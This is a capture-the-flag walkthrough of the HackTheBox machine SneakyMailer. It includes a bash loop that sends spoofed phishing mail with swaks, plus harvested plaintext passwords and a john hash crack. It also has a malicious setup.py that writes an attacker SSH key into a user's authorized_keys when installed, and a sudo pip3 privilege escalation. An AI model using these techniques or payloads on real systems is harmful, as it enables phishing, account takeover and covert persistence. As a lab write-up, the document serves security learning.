Summary

SneakyMailer, was a medium difficulty linux box created by Hackthebox user, sulcud. The box was all about creating a mail list from the emails found on the website. and using swaks to send phishing mail to all the employees and getting a hit back with one user email credentials. login to email we find credential for dev ftp. using that we can upload a shell and visit that on dev subdomain and we get a shell back. after getting the shell we can reuse the ftp credential for user developer we can switch to developer user. also in pypi webroot we find a .htaccess and we can crack the password for the hash.visiting the site we see that is a python registry so we create a custom package and upload to get a shell as low.Checking sudo -l we see we can run pip3 without password so using GTFOBINs we can get root.

Inital Enumeration

nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 16:59 IST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 4.25% done; ETC: 17:00 (0:00:45 remaining)
Nmap scan report for 10.10.10.197
Host is up (0.12s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp   open  http     nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS QUOTA IMAP4rev1 CAPABILITY STARTTLS ACL2=UNION ENABLE SORT THREAD=REFERENCES NAMESPACE IDLE CHILDREN OK completed THREAD=ORDEREDSUBJECT UTF8=ACCEPTA0001 ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: UIDPLUS QUOTA IMAP4rev1 CAPABILITY ACL2=UNION ENABLE SORT AUTH=PLAIN THREAD=REFERENCES NAMESPACE IDLE CHILDREN OK completed THREAD=ORDEREDSUBJECT UTF8=ACCEPTA0001 ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after:  2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host:  debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 121.77 seconds

We got so many ports open lets start with port 80.

Web Port 80

In the nmap result we see as http-title: Did not follow redirect to http://sneakycorp.htb so lets add http://sneakycorp.htb in /etc/hosts and see the web

sneakycorp.htb

As we have a custom domain lets also enumerate for custom subdomain. While we poke at the website.

Team page of the site show us few emails

So I got all the emails from the webpage and made an email list.

Also we find something on vhost bruting

gobuster vhost -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt  -u http://sneakycorp.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:          http://sneakycorp.htb
[+] Threads:      10
[+] Wordlist:     /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
===============================================================
2020/08/29 17:17:58 Starting gobuster
===============================================================
Found: dev.sneakycorp.htb (Status: 200) [Size: 13742]

Lets add that to our host check that page.

dev.sneakycorp.htb

It look like the development version of the same website

and we also have a register page.

trying to register i don’t see that seems to be doing anything else

SMTP?

As we have email list and an smtp server. I thought of spoofing mail to all the emails.

I choose angelicaramos@sneakymailer.htb as the from email as it was CEO email-id

Using swaks

swaks --from "angelicaramos@sneakymailer.htb" --body "Test" --to angelicaramos@sneakymailer.htb
=== Trying sneakymailer.htb:25...
=== Connected to sneakymailer.htb.
<-  220 debian ESMTP Postfix (Debian/GNU)
 -> EHLO hackthebox
<-  250-debian
<-  250-PIPELINING
<-  250-SIZE 10240000
<-  250-VRFY
<-  250-ETRN
<-  250-STARTTLS
<-  250-ENHANCEDSTATUSCODES
<-  250-8BITMIME
<-  250-DSN
<-  250-SMTPUTF8
<-  250 CHUNKING
 -> MAIL FROM:<angelicaramos@sneakymailer.htb>
<-  250 2.1.0 Ok
 -> RCPT TO:<angelicaramos@sneakymailer.htb>
<-  250 2.1.5 Ok
 -> DATA
<-  354 End data with <CR><LF>.<CR><LF>
 -> Date: Sat, 29 Aug 2020 17:36:22 +0530
 -> To: angelicaramos@sneakymailer.htb
 -> From: angelicaramos@sneakymailer.htb
 -> Subject: test Sat, 29 Aug 2020 17:36:22 +0530
 -> Message-Id: <20200829173622.070002@hackthebox>
 -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
 ->
 -> Test
 ->
 ->
 -> .
<-  250 2.0.0 Ok: queued as 287F5248DD
 -> QUIT
<-  221 2.0.0 Bye
=== Connection closed with remote host.

we see we can send mail so lets try sending a url to all the emails

#!/bin/bash

while IFS= read -r line; do
    echo "Sending Mail to: $line"
    swaks --from "angelicaramos@sneakymailer.htb" --body "http://10.10.14.12:8000/" --to $line > /dev/null
done < emails.list

POST / HTTP/1.1
Host: 10.10.14.12:8000
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 185
Content-Type: application/x-www-form-urlencoded

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

which get us a cred as paulbyrd:^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

trying that on ssh and ftp we get invalid creds lets try on IMPS

Hello administrator, I want to change this password for the developer account

Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Please notify me when you do it

FTP

login on ftp using developer credentials we see we can upload file to that. I tested that by uploading a test.txt and visiting

Shell (www-data)

doing ls

looking in pypi folder we find an .htpasswd

and cracking the hash using john

john --wordlist=/usr/share/wordlists/rockyou.txt htpasswd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
soufianeelhaoui  (pypi)
1g 0:00:00:42 DONE (2020-08-29 23:02) 0.02331g/s 83335p/s 83335c/s 83335C/s souheib2..souderton16
Use the "--show" option to display all of the cracked passwords reliably
Session completed

we get the password as soufianeelhaoui

Also trying username developer with the password we found for ftp we can get a shell as developer

Developer

Web Pypi(8080)

Seeing it is a pypi registry let us create a python package and try to upload that to the server.
Creating and uploading a package using

https://www.linode.com/docs/applications/project-management/how-to-create-a-private-python-package-repository/

Creating .pypirc

Checking https://pypi.org/project/pypiserver/#upload-with-setuptools

we see we need to have a ~/.pypirc to contain the credentials and host

[distutils]
index-servers = local

[local]
repository: http://pypi.sneakycorp.htb:8080
username: pypi
password: soufianeelhaoui

setup.py

For Code execution i choose to write my public key to low/.ssh/authorized_keys

so wrote an setup.py accordingly with the help of https://packaging.python.org/tutorials/packaging-projects/

import setuptools

try:
    with open("/home/low/.ssh/authorized_keys", "a") as f:
        f.write("\nssh-rsa <public key> ")
        f.close()
except Exception as e:
    pass

setuptools.setup(
    name="example-pkg-YOUR-USERNAME-HERE", # Replace with your own username
    version="0.0.1",
    author="Example Author",
    author_email="author@example.com",
    description="A small example package",
    long_description="long",
    long_description_content_type="text/markdown",
    url="https://github.com/pypa/sampleproject",
    packages=setuptools.find_packages(),
    classifiers=[
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    python_requires='>=3.6',
)

And using setup.py sdist we can upload to the server

https://zestreleaser.readthedocs.io/en/latest/uploading.html

python3 setup.py sdist register -r local upload -r local

Low

ssh-ing using the private key we get a shell

Checking sudo -l revels

Privilege Escalation

running sudo -l revelea that we can run pip3 without password so checking gtfobins. We can use that to get a shell as root.

and we have pwned SenakyMailer 💃